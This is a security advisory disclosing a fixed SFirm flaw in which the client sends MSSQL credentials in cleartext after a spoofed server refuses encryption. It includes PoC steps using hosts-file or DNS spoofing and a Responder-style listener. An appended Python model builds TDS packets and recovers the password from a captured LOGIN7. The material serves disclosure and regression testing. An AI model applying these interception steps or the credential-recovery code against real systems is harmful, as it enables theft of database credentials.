-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Advisory ID:               SYSS-2025-055
Product:                   SFirm
Manufacturer:              Star Finanz-Software Entwicklung und Vertriebs GmbH
Affected Version(s):       Version 4 Patch 25.08 Build 8427
Tested Version(s):         Version 4 Patch 25.08 Build 8427
Vulnerability Type:        Insecure Transmission of Credentials (CWE-319),
                           Selection of Less-Secure Algorithm During
                           Negotiation (CWE-757)
Risk Level:                High
Solution Status:           Fixed
Manufacturer Notification: 2025-09-08
Solution Date:             2025-11-12
Public Disclosure:         2025-12-15
CVE Reference:             CVE-2025-66981
Author of Advisory:        Thomas Markloff, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

SFirm is banking software from Star Finanz-Software Entwicklung und
Vertriebs GmbH for corporate customers and self-employed users who need
more professional financial management than standard online banking
offers.

When SFirm connects to its MSSQL database, it transmits the login
details (username and password) unencrypted if the server side reports
that it does not support encryption and encryption is not enforced on
the client. An attacker with access to the network path (e.g., via a
man-in-the-middle attack or packet sniffing) can therefore intercept
the database credentials in cleartext.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Through DNS spoofing, an attacker can redirect the client's connection
attempt to a malicious MSSQL server. If the spoofed server declares
that it does not support encryption, the client falls back to an
unencrypted connection and transmits the MSSQL credentials (username
and password) in cleartext. This lets the attacker capture valid
database credentials and potentially gain unauthorized access to the
legitimate database server.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. On the client machine, the file
   "C:\Windows\System32\drivers\etc\hosts" is modified so that the DNS
   name of the legitimate MSSQL server resolves to the attacker's IP
   address. Alternatively, an attacker could use DNS spoofing to
   redirect the client's request.

2. On the attacker's system, a service like Responder is started that
   accepts incoming MSSQL connections and refuses encryption.

3. The victim launches the SFirm 4 application, which attempts to
   connect to the MSSQL server using the spoofed address.

4. Since the malicious server does not offer encryption, the client
   falls back to cleartext communication and transmits the MSSQL
   credentials (username and password) without protection.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update SFirm 4 to patch release 4/25.10 or newer.

More information:
https://www.sfirm.de/sfirm/neu-in-sfirm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-09-08: Vulnerability discovered
2025-09-08: Vulnerability reported to manufacturer
2025-09-09: Manufacturer confirms receipt of the vulnerability report
2025-09-29 - 2025-11-10: Consultation and cooperation with the
            manufacturer
2025-11-12: Fix of vulnerability with patch release 4/25.10
2025-12-15: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for SFirm
    https://www.sfirm.de/sfirm/
[2] SySS Security Advisory SYSS-2025-055
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-055.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Thomas Markloff of SySS GmbH.

E-Mail: thomas.markloff@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thomas_Markloff.asc
Key ID: 0xD3E076350BF2EC0E
Key Fingerprint: 5FD6 EA37 B546 1BE8 EC5C A6DC D3E0 7635 0BF2 EC0E

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEX9bqN7VGG+jsXKbc0+B2NQvy7A4FAmlg0YcACgkQ0+B2NQvy
7A5yiA//SSvpaslByBUPuhADAiN8uWJ2Pabis4ne4tFzFi20RLZ8vTYfZThgyVsF
fuMoKZ9SHQ/oBR4ZSgwfoM2y8PHSX4CIsDrFOhHp1hxVUDfsb5VO6bqAZQO8Xkmi
ozH5144pXlKqoFGM/eIF6CaCInHs2CjWwsYuY3puCzmRN2SWWZNW0Ad7oeGjnjKv
TK0f0fh1WBZWxVlyocYXtISGqX+Wg5b0envRrKyNgx2nFL3UwFyhBRyaf06/v9Oh
BVEMQ6OrGtVoaij8B+8Z+BjjtkEi3u9rOcybD+XyhG07ez1f83Gzh/14J2rnGKVR
xYuP75u7rdxNmpbFj5+IRwjaWRY3aVBLCVFq7YjrdkTln/NgvlaQfAKqoL8KRQR6
6y983zbcLFRfH3wsqUr/3l2VCGkDA8JpyuyC+1M4z6JkNXN2wOQyxj90a8R/Ukxg
VlH+dDgocOvwP9b9cT7EMwtZuCHM1Sdb2eOZCeD15/8VrbfhzXw7s0hx/84DWQwf
OJaBEbYLslHD7au+c5/1OWtD5kJKX+H7G54ccEnJTip8Ok+meHL2WayKFyMbgMnH
dPxEzFPFLJFlqF3pPMtheoiJTmJZObAnfS0+jIYJRpirEtIqR1svI2Z2wVWr+Slx
WD/gHtyUT6DT7wOB2J551qSxaXfA4RDFQ0so73pYH2M0ITHNlfI=
=whqY
-----END PGP SIGNATURE-----
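The negotiation and fallback described in the Vulnerability Details and PoC sections above, modelled in Python as an added example; this is not code from the advisory, from SySS or from Star Finanz. The packet layouts (PRELOGIN option table, LOGIN7 offset table, and the nibble-swap/XOR-0xA5 password obfuscation) follow the MS-TDS specification. The mapping of client policies to outcomes in client_connect is a simplified reading of the MS-TDS negotiation table and is an assumption, as are the hostname, application name, server name and the credentials, which are constructed. With an opportunistic policy (ENCRYPT_OFF) the modelled client builds LOGIN7 in cleartext as soon as the peer answers ENCRYPT_NOT_SUP, which is what a Responder-style listener relies on; a policy that enforces encryption refuses the downgrade instead.

```python
"""Model of the TDS pre-login encryption negotiation and the cleartext LOGIN7
fallback from the advisory.  Added example, not SySS or Star Finanz code.
Packet layouts follow MS-TDS; the client policy table is a simplification."""
import struct

# PRELOGIN ENCRYPTION option values (MS-TDS) and the two TDS packet types used here
ENCRYPT_OFF, ENCRYPT_ON, ENCRYPT_NOT_SUP, ENCRYPT_REQ = 0x00, 0x01, 0x02, 0x03
PRELOGIN, LOGIN7 = 0x12, 0x10
LOGIN7_FIXED = 94  # bytes before the variable data block in a TDS 7.2+ LOGIN7


def tds_packet(ptype, payload):
    """8-byte TDS header: type, status 0x01 (end of message), length, SPID, id, window."""
    return struct.pack(">BBHHBB", ptype, 0x01, 8 + len(payload), 0, 1, 0) + payload


def build_prelogin(encryption):
    """PRELOGIN carrying a VERSION option (token 0) and an ENCRYPTION option (token 1)."""
    options = [(0x00, b"\x0c\x00\x00\x00\x00\x00"), (0x01, bytes([encryption]))]
    table, data, offset = b"", b"", 5 * len(options) + 1   # 5-byte entries + 0xFF terminator
    for token, value in options:
        table += struct.pack(">BHH", token, offset, len(value))
        data += value
        offset += len(value)
    return tds_packet(PRELOGIN, table + b"\xff" + data)


def prelogin_encryption(packet):
    """Walk the PRELOGIN option table and return the peer's ENCRYPTION value."""
    body, pos = packet[8:], 0
    while body[pos] != 0xFF:
        token, off, _length = struct.unpack_from(">BHH", body, pos)
        if token == 0x01:
            return body[off]
        pos += 5
    raise ValueError("PRELOGIN without ENCRYPTION option")


def obfuscate_password(password):
    """LOGIN7 password 'obfuscation': per byte, swap nibbles then XOR 0xA5. Not encryption."""
    return bytes((((b << 4) | (b >> 4)) & 0xFF) ^ 0xA5 for b in password.encode("utf-16-le"))


def deobfuscate_password(blob):
    """Inverse of obfuscate_password; anyone on the wire can apply it."""
    return bytes((((b ^ 0xA5) << 4) | ((b ^ 0xA5) >> 4)) & 0xFF for b in blob).decode("utf-16-le")


def build_login7(user, password, host="WS01", app="SFirm", server="sql.example", db="master"):
    """LOGIN7 with SQL authentication; offsets are relative to the start of the payload.
    Default host/app/server/db values are constructed for the example."""
    strings = [host, user, None, app, server, "", "", "", db]   # None marks the password slot
    pairs, data, off = b"", b"", LOGIN7_FIXED
    for s in strings:
        blob = obfuscate_password(password) if s is None else s.encode("utf-16-le")
        pairs += struct.pack("<HH", off, len(blob) // 2)       # offset, length in UTF-16 chars
        data += blob
        off += len(blob)
    # Length placeholder, TDS 7.4, packet size, prog ver, PID, conn id, 4 flag bytes, TZ, LCID
    head = struct.pack("<IIIIIIBBBBiI", 0, 0x74000004, 4096, 0, 0, 0, 0, 0, 0, 0, 0, 0x0409)
    # ClientID (6 bytes), SSPI, AtchDBFile, ChangePassword offset/length pairs, cbSSPILong
    tail = b"\x00" * 6 + struct.pack("<HHHHHHI", 0, 0, 0, 0, 0, 0, 0)
    payload = head + pairs + tail + data
    return tds_packet(LOGIN7, struct.pack("<I", len(payload)) + payload[4:])


def login7_credentials(packet):
    """What a sniffer or rogue server recovers from a LOGIN7 sent without TLS."""
    p = packet[8:]

    def field(index):
        off, cch = struct.unpack_from("<HH", p, 36 + 4 * index)
        return p[off:off + 2 * cch]

    return field(1).decode("utf-16-le"), deobfuscate_password(field(2))


def client_connect(policy, server_prelogin, user, password):
    """Client decision after the server's PRELOGIN (simplified MS-TDS table, an assumption).
    Returns ("tls", None) when the login will be wrapped in TLS,
    ("cleartext", login7) when the client downgrades (the advisory's behaviour),
    and raises when a policy that enforces encryption meets ENCRYPT_NOT_SUP."""
    if prelogin_encryption(server_prelogin) != ENCRYPT_NOT_SUP:
        return "tls", None
    if policy in (ENCRYPT_ON, ENCRYPT_REQ):
        raise ConnectionError("server refused encryption; not sending LOGIN7 in cleartext")
    return "cleartext", build_login7(user, password)   # CWE-757: silent downgrade


if __name__ == "__main__":
    rogue = build_prelogin(ENCRYPT_NOT_SUP)      # what a Responder-style MSSQL listener answers
    mode, login = client_connect(ENCRYPT_OFF, rogue, "sfirm_db", "S3cret!")   # constructed creds
    print(mode, login7_credentials(login))       # cleartext ('sfirm_db', 'S3cret!')
```

The deobfuscation step is why plain packet sniffing suffices once the downgrade has happened: LOGIN7 only nibble-swaps and XORs the password bytes, it does not encrypt them. A practical regression check for a patched client is the rogue PRELOGIN built here: point the client at a listener that answers ENCRYPT_NOT_SUP and confirm on the wire that no LOGIN7 packet follows.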